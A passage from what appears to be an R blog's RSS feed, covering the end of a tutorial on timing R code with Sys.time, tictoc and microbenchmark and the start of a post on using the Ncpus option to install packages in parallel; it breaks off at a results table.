&lt;p&gt;As time goes on, your R scripts are probably getting longer and more complicated, &lt;em&gt;right&lt;/em&gt;? Timing parts of your script could save you precious time when re-running code over and over again. Today I’m going to go through the 4 main functions for doing so.&lt;/p&gt;
&lt;h2 id="nested-timings"&gt;Nested timings&lt;/h2&gt;
&lt;h3 id="1-systime"&gt;1) &lt;code&gt;Sys.time()&lt;/code&gt;&lt;/h3&gt;
&lt;p&gt;&lt;code&gt;Sys.time()&lt;/code&gt; takes a “snap-shot” of the current time and so it can be used to record start and end times of code.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;start_time &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;Sys.time&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;Sys.sleep&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;0.5&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;end_time &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;Sys.time&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To calculate the difference, we just use a simple subtraction&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;end_time &lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt; start_time
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Time difference of 0.5027 secs&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Notice it creates a neat little message for the time difference.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2017-timing-in-r"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="2-the-tictoc-package"&gt;2) The {tictoc} package&lt;/h3&gt;
&lt;p&gt;You can install the &lt;code&gt;CRAN&lt;/code&gt; version of {tictoc} via&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install.packages&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;tictoc&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;whilst the most recent development is available via &lt;a href="https://github.com/collectivemedia/tictoc" rel="external"&gt;the {tictoc} GitHub page&lt;/a&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;tictoc&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Like &lt;code&gt;Sys.time()&lt;/code&gt;, {tictoc} also gives us ability to nest timings within code. However, we now have some more options to customise our timing. At it’s most basic it acts like &lt;code&gt;Sys.time()&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;tic&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;Sys.sleep&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;0.5&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;toc&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 0.505 sec elapsed&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now for a more contrived example.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# start timer for the entire section, notice we can name sections of code&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;tic&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;total time&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# start timer for first subsection&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;tic&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Start time til half way&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;Sys.sleep&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# end timer for the first subsection, log = TRUE tells toc to give us a message&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;toc&lt;/span&gt;(log &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Start time til half way: 2.013 sec elapsed&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now to start the timer for the second subsection&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;tic&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Half way til end&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;Sys.sleep&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# end timer for second subsection&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;toc&lt;/span&gt;(log &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Half way til end: 2.005 sec elapsed&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# end timer for entire section&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;toc&lt;/span&gt;(log &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## total time: 4.027 sec elapsed&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We can view the results as a list (&lt;code&gt;format = TRUE&lt;/code&gt; returns this list in a nice format), rather than raw code&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;tic.log&lt;/span&gt;(format &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## user system elapsed&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 0.000 0.000 1.001&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We only want to take notice of the “elapsed” time, for the definition of the “user” and “system” times see &lt;a href="http://r.789695.n4.nabble.com/Meaning-of-proc-time-td2303263.html#a2306691" rel="external"&gt;this thread.&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;For a repeated timing, we would use the &lt;code&gt;replicate()&lt;/code&gt; function.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;system.time&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;replicate&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;Sys.sleep&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;0.1&lt;/span&gt;)))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## user system elapsed&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 0.004 0.000 1.004&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="2-the-microbenchmark-package"&gt;2) The microbenchmark package&lt;/h3&gt;
&lt;p&gt;You can install the &lt;code&gt;CRAN&lt;/code&gt; version of {microbenchmark} via&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install.packages&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;microbenchmark&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Alternatively you can install the latest update via &lt;a href="https://github.com/olafmersmann/microbenchmark" rel="external"&gt;the {microbenchmark} GitHub page.&lt;/a&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;microbenchmark&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;At it’s most basic, &lt;code&gt;microbenchmark()&lt;/code&gt; can we used to time single pieces of code.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# times = 10: repeat the test 10 times&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# unit = &amp;#34;s&amp;#34;: output in seconds&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;microbenchmark&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;Sys.sleep&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;0.1&lt;/span&gt;), times &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;, unit &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;s&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Unit: seconds&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## expr min lq mean median uq max neval&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Sys.sleep(0.1) 0.1001 0.1002 0.1002 0.1002 0.1002 0.1002 10&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Notice we get a nicely formatted table of summary statistics. We can record our times in anything from seconds to nanoseconds(!!!!). Already this is better than &lt;code&gt;system.time()&lt;/code&gt;. Not only that, but we can compare sections of code in an easy-to-do way and name the sections of code for an easy-to-read output.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sleep &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;microbenchmark&lt;/span&gt;(sleepy &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;Sys.sleep&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;0.1&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sleepier &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;Sys.sleep&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;0.2&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sleepiest &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;Sys.sleep&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;0.3&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; times &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; unit &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;s&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;As well as this (more?!) {microbenchmark} comes with a two built-in plotting functions.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;microbenchmark&lt;span style="color:#ff7b72;font-weight:bold"&gt;:::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;autoplot.microbenchmark&lt;/span&gt;(sleep)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img class="image-center" src="autoplot.png" style="width:450px; class:image-center"&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;microbenchmark&lt;span style="color:#ff7b72;font-weight:bold"&gt;:::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;boxplot.microbenchmark&lt;/span&gt;(sleep)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img class="image-center" src="boxplot.png" style="width:450px; class:image-center"&gt;
&lt;p&gt;These provide quick and efficient ways of visualising our timings.&lt;/p&gt;
&lt;h2 id="conclusion"&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;&lt;code&gt;Sys.time()&lt;/code&gt; and &lt;code&gt;system.time()&lt;/code&gt; have there place, but for most cases we can do better. The {tictoc} and {microbenchmark} packages are particularly useful and make it easy to store timings for later use, and the range of options for both packages stretch far past the options for &lt;code&gt;Sys.time()&lt;/code&gt; and &lt;code&gt;system.time()&lt;/code&gt;. The built-in plotting functions are handy.&lt;/p&gt;
&lt;p&gt;Thanks for chatting!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/timing-in-r/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Speeding up package installation</title><link>https://www.jumpingrivers.com/blog/speeding-up-package-installation/</link><pubDate>Wed, 15 Nov 2017 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/speeding-up-package-installation/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/speeding-up-package-installation/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/speeding-up-package-installation/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h3 id="cant-be-bothered-reading-tell-me-now"&gt;Can’t be bothered reading, tell me now&lt;/h3&gt;
&lt;p&gt;A simple one line tweak can significantly speed up package installation and updates.&lt;/p&gt;
&lt;h3 id="the-wonder-of-cran"&gt;The wonder of CRAN&lt;/h3&gt;
&lt;p&gt;One of the best features of R is CRAN. When a package is submitted to CRAN, not only is it checked under three versions of R&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;R-past, R-release and R-devel&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;but also three different operating systems&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Windows, Linux and Mac (with multiple flavours of each)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;CRAN also checks that the updated package doesn’t break existing packages. This last part is particularly tricky when you consider all the dependencies a package like {ggplot2} or {Rcpp} have. Furthermore, it performs all these checks within 24 hours, ready for the next set packages.&lt;/p&gt;
&lt;p&gt;What many people don’t realise is that for CRAN to perform this miracle of package checking, it builds and checks these packages in &lt;strong&gt;parallel&lt;/strong&gt;; so rather than installing a single package at a time, it checks multiple packages at once. Obviously some care has to be taken when checking/installing packages due to the connectivity between packages, but R takes care of these details.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2017-speeding-up-package-installation"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="parallel-package-installation-ncpus"&gt;Parallel package installation: Ncpus&lt;/h3&gt;
&lt;p&gt;If you examine the help package of &lt;code&gt;?install.packages&lt;/code&gt;{.R}, there’s a sneaky argument called &lt;code&gt;Ncpus&lt;/code&gt;. From the help page:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;code&gt;Ncpus&lt;/code&gt;: The number of parallel processes to use for a parallel install of more than one source package.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The default value of this argument is&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Ncpus = getOption(‘Ncpus’, 1L)&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The &lt;code&gt;getOption()&lt;/code&gt; part determines if the value has been set in &lt;code&gt;options()&lt;/code&gt;. If no value is found, the default number of processes to use is &lt;code&gt;1&lt;/code&gt;. If you haven’t heard of &lt;code&gt;Ncpus&lt;/code&gt;, it’s almost certainly 1, but you can check using&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;getOption&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Ncpus&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;1L&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] 6&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="does-it-work"&gt;Does it work?&lt;/h3&gt;
&lt;p&gt;To test if changing the value of &lt;code&gt;Ncpus&lt;/code&gt; makes a difference, we’ll install the {tidyverse} package with all it’s associated dependencies. On my machine, all packages live in a directory called &lt;code&gt;/rpackages/&lt;/code&gt;, for each test below I deleted &lt;code&gt;/rpackages/&lt;/code&gt; so all {tidyverse} dependencies were reinstalled.&lt;/p&gt;
&lt;p&gt;My machine has eight cores&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;parallel&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;detectCores&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# [1] 8&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;So it doesn’t make sense to set &lt;code&gt;Ncpus&lt;/code&gt; above 8. Another point is that although R reports that I have 8 cores, I only have 4 physical cores; the other 4 are due to hyper-threading. In practice, this means that I’m only likely to get at most a 6 fold speed-up.&lt;/p&gt;
&lt;p&gt;For this experiment, I used the RStudio CRAN repository, set via&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;options&lt;/span&gt;(repos &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;CRAN&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;https://cran.rstudio.com/&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To time the installation procedure, I just use the standard &lt;code&gt;system.time()&lt;/code&gt; function.&lt;/p&gt;
&lt;p&gt;After removing the &lt;code&gt;/rpackages/&lt;/code&gt; directory, I set &lt;code&gt;Ncpus&lt;/code&gt; equal to &lt;code&gt;1&lt;/code&gt; and installed the {tidyverse} package with dependencies&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;options&lt;/span&gt;(Ncpus &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;system.time&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install.packages&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;tidyverse&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Time in seconds&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# user system elapsed&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# 372.252 15.468 409.364&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;So a standard installation takes almost 7 minutes (409/60)!&lt;/p&gt;
&lt;p&gt;Before we go on, it’s worth noting a couple of caveats:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;This timing also includes the download time of the packages; however for simplicity I’m ignoring this. Downloading the packages takes around 20 seconds&lt;/li&gt;
&lt;li&gt;The above number uses a sample size of 1 to estimate the time; repeating the above experiment, resulted in a remarkably consistent installation time of 410 seconds.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Repeating this experiment with different values of &lt;code&gt;Ncpus&lt;/code&gt; gives the table below:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Ncpus&lt;/th&gt;
&lt;th&gt;Elapsed (Secs)&lt;/th&gt;
&lt;th&gt;Ratio&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
